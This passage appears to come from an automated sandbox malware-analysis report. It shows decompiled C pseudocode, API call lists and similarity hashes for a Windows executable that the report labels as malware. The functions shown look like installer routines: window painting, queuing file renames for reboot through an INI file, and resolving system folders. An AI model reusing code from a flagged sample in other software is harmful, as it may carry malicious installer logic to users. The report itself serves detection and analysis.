						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                            0x0040100a
                                                                            0x00401039
                                                                            0x00401047
                                                                            0x0040104d
                                                                            0x00401051
                                                                            0x0040105b
                                                                            0x00401061
                                                                            0x00401064
                                                                            0x004010f3
                                                                            0x00401089
                                                                            0x0040108c
                                                                            0x004010a6
                                                                            0x004010bd
                                                                            0x004010cc
                                                                            0x004010cf
                                                                            0x004010d5
                                                                            0x004010d9
                                                                            0x004010e4
                                                                            0x004010ed
                                                                            0x004010ef
                                                                            0x004010ef
                                                                            0x00401100
                                                                            0x00401105
                                                                            0x0040110d
                                                                            0x00401110
                                                                            0x00401112
                                                                            0x00401118
                                                                            0x0040111f
                                                                            0x00401126
                                                                            0x00401130
                                                                            0x00401142
                                                                            0x00401156
                                                                            0x00401160
                                                                            0x00401165
                                                                            0x00401165
                                                                            0x00401110
                                                                            0x0040116e
                                                                            0x00000000
                                                                            0x00401178
                                                                            0x00401010
                                                                            0x00401013
                                                                            0x00401015
                                                                            0x0040101f
                                                                            0x0040101f
                                                                            0x00000000

                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                            • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                            • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                            • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                            0x00406183
                                                                            0x0040618c
                                                                            0x00406193
                                                                            0x0040619d
                                                                            0x004061b1
                                                                            0x004061d9
                                                                            0x004061e4
                                                                            0x004061e8
                                                                            0x00406208
                                                                            0x0040620f
                                                                            0x00406219
                                                                            0x00406226
                                                                            0x0040622b
                                                                            0x00406230
                                                                            0x00406234
                                                                            0x00406243
                                                                            0x00406245
                                                                            0x00406252
                                                                            0x00406256
                                                                            0x004062f1
                                                                            0x00000000
                                                                            0x0040626c
                                                                            0x00406279
                                                                            0x0040629d
                                                                            0x004062a1
                                                                            0x004062c0
                                                                            0x004062c4
                                                                            0x004062c4
                                                                            0x004062c6
                                                                            0x004062cf
                                                                            0x004062da
                                                                            0x004062e5
                                                                            0x004062eb
                                                                            0x00000000
                                                                            0x004062eb
                                                                            0x004062a3
                                                                            0x004062a6
                                                                            0x004062b1
                                                                            0x004062ad
                                                                            0x004062af
                                                                            0x004062b0
                                                                            0x004062b0
                                                                            0x004062b8
                                                                            0x004062ba
                                                                            0x00000000
                                                                            0x004062ba
                                                                            0x00406284
                                                                            0x0040628a
                                                                            0x00000000
                                                                            0x0040628a
                                                                            0x00406256
                                                                            0x00406234
                                                                            0x004061b3
                                                                            0x004061be
                                                                            0x004061c7
                                                                            0x004061cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004061cb
                                                                            0x004062fc

                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                            • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                            • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                            • wsprintfA.USER32 ref: 00406202
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$[Rename]
                                                                            • API String ID: 2171350718-461813615
                                                                            • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                            • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                            • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                            • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040657A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 72%
                                                                            			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x433edc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x436000;
								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                                            0x0040657a
                                                                            0x0040657a
                                                                            0x0040657a
                                                                            0x00406580
                                                                            0x00406585
                                                                            0x00406596
                                                                            0x00406596
                                                                            0x0040659e
                                                                            0x0040659f
                                                                            0x004065a0
                                                                            0x004065a1
                                                                            0x004065a4
                                                                            0x004065ac
                                                                            0x004065ae
                                                                            0x004065bf
                                                                            0x004065c2
                                                                            0x004065c2
                                                                            0x004065c6
                                                                            0x004065cc
                                                                            0x004065cf
                                                                            0x004067aa
                                                                            0x004067aa
                                                                            0x004067b5
                                                                            0x004067c1
                                                                            0x004067c1
                                                                            0x00000000
                                                                            0x004065d5
                                                                            0x004065da
                                                                            0x004065ef
                                                                            0x004065f0
                                                                            0x004065f6
                                                                            0x00406788
                                                                            0x00406796
                                                                            0x00406799
                                                                            0x00406799
                                                                            0x0040678a
                                                                            0x0040678d
                                                                            0x00406790
                                                                            0x00406792
                                                                            0x00406792
                                                                            0x0040679b
                                                                            0x0040679b
                                                                            0x004067a1
                                                                            0x004067a4
                                                                            0x004065d7
                                                                            0x00000000
                                                                            0x004065d7
                                                                            0x00000000
                                                                            0x004067a4
                                                                            0x004065fc
                                                                            0x004065ff
                                                                            0x0040660e
                                                                            0x00406615
                                                                            0x00406621
                                                                            0x00406624
                                                                            0x00406627
                                                                            0x00406628
                                                                            0x0040662d
                                                                            0x00406633
                                                                            0x00406636
                                                                            0x00406639
                                                                            0x0040672c
                                                                            0x00406731
                                                                            0x00406764
                                                                            0x00406769
                                                                            0x0040676e
                                                                            0x00406773
                                                                            0x00406773
                                                                            0x00406778
                                                                            0x0040677e
                                                                            0x00406781
                                                                            0x00000000
                                                                            0x00406781
                                                                            0x00406733
                                                                            0x00406736
                                                                            0x00406739
                                                                            0x0040674e
                                                                            0x00406755
                                                                            0x0040673b
                                                                            0x00406742
                                                                            0x00406742
                                                                            0x0040675d
                                                                            0x00406760
                                                                            0x00406724
                                                                            0x00406725
                                                                            0x00406725
                                                                            0x00000000
                                                                            0x00406760
                                                                            0x00406646
                                                                            0x0040664a
                                                                            0x0040664a
                                                                            0x0040664b
                                                                            0x0040664d
                                                                            0x0040668a
                                                                            0x0040668d
                                                                            0x0040669d
                                                                            0x004066a0
                                                                            0x004066a8
                                                                            0x004066ae
                                                                            0x004066ae
                                                                            0x00406709
                                                                            0x00406709
                                                                            0x0040670b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004066b2
                                                                            0x004066b7
                                                                            0x004066b8
                                                                            0x004066ba
                                                                            0x004066d1
                                                                            0x004066df
                                                                            0x004066e5
                                                                            0x004066e7
                                                                            0x00406705
                                                                            0x00406705
                                                                            0x00406705
                                                                            0x00000000
                                                                            0x00406705
                                                                            0x004066ed
                                                                            0x004066f6
                                                                            0x004066f9
                                                                            0x004066ff
                                                                            0x00406703
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406703
                                                                            0x004066cb
                                                                            0x004066cd
                                                                            0x004066cf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004066cf
                                                                            0x00000000
                                                                            0x00406709
                                                                            0x00406695
                                                                            0x00000000
                                                                            0x0040664f
                                                                            0x0040666d
                                                                            0x00406676
                                                                            0x00406713
                                                                            0x00406717
                                                                            0x0040671f
                                                                            0x0040671f
                                                                            0x00000000
                                                                            0x00406717
                                                                            0x00406680
                                                                            0x0040670d
                                                                            0x00406711
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406711
                                                                            0x0040664d
                                                                            0x00000000
                                                                            0x004065da

                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00000000,00425A20,76FA23A0), ref: 004066A8
                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                            • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000), ref: 00406779
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 4260037668-854254380
                                                                            • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                            • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                            • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                            • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                            0x00404512
                                                                            0x004045c8
                                                                            0x00000000
                                                                            0x004045c8
                                                                            0x00404523
                                                                            0x00404527
                                                                            0x00000000
                                                                            0x00404541
                                                                            0x00404541
                                                                            0x0040454a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040454c
                                                                            0x00404558
                                                                            0x0040455b
                                                                            0x0040455b
                                                                            0x00404561
                                                                            0x00404567
                                                                            0x00404567
                                                                            0x00404573
                                                                            0x00404579
                                                                            0x00404580
                                                                            0x00404583
                                                                            0x00404586
                                                                            0x00404588
                                                                            0x00404588
                                                                            0x00404590
                                                                            0x00404596
                                                                            0x00404596
                                                                            0x004045a0
                                                                            0x004045a5
                                                                            0x004045a8
                                                                            0x004045ad
                                                                            0x004045b0
                                                                            0x004045b0
                                                                            0x004045c0
                                                                            0x004045c0
                                                                            0x00000000
                                                                            0x004045c3

                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                            • GetSysColor.USER32(00000000), ref: 0040455B
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                            • SetBkMode.GDI32(?,?), ref: 00404573
                                                                            • GetSysColor.USER32(?), ref: 00404586
                                                                            • SetBkColor.GDI32(?,?), ref: 00404596
                                                                            • DeleteObject.GDI32(?), ref: 004045B0
                                                                            • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                            • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                            • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 87%
                                                                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
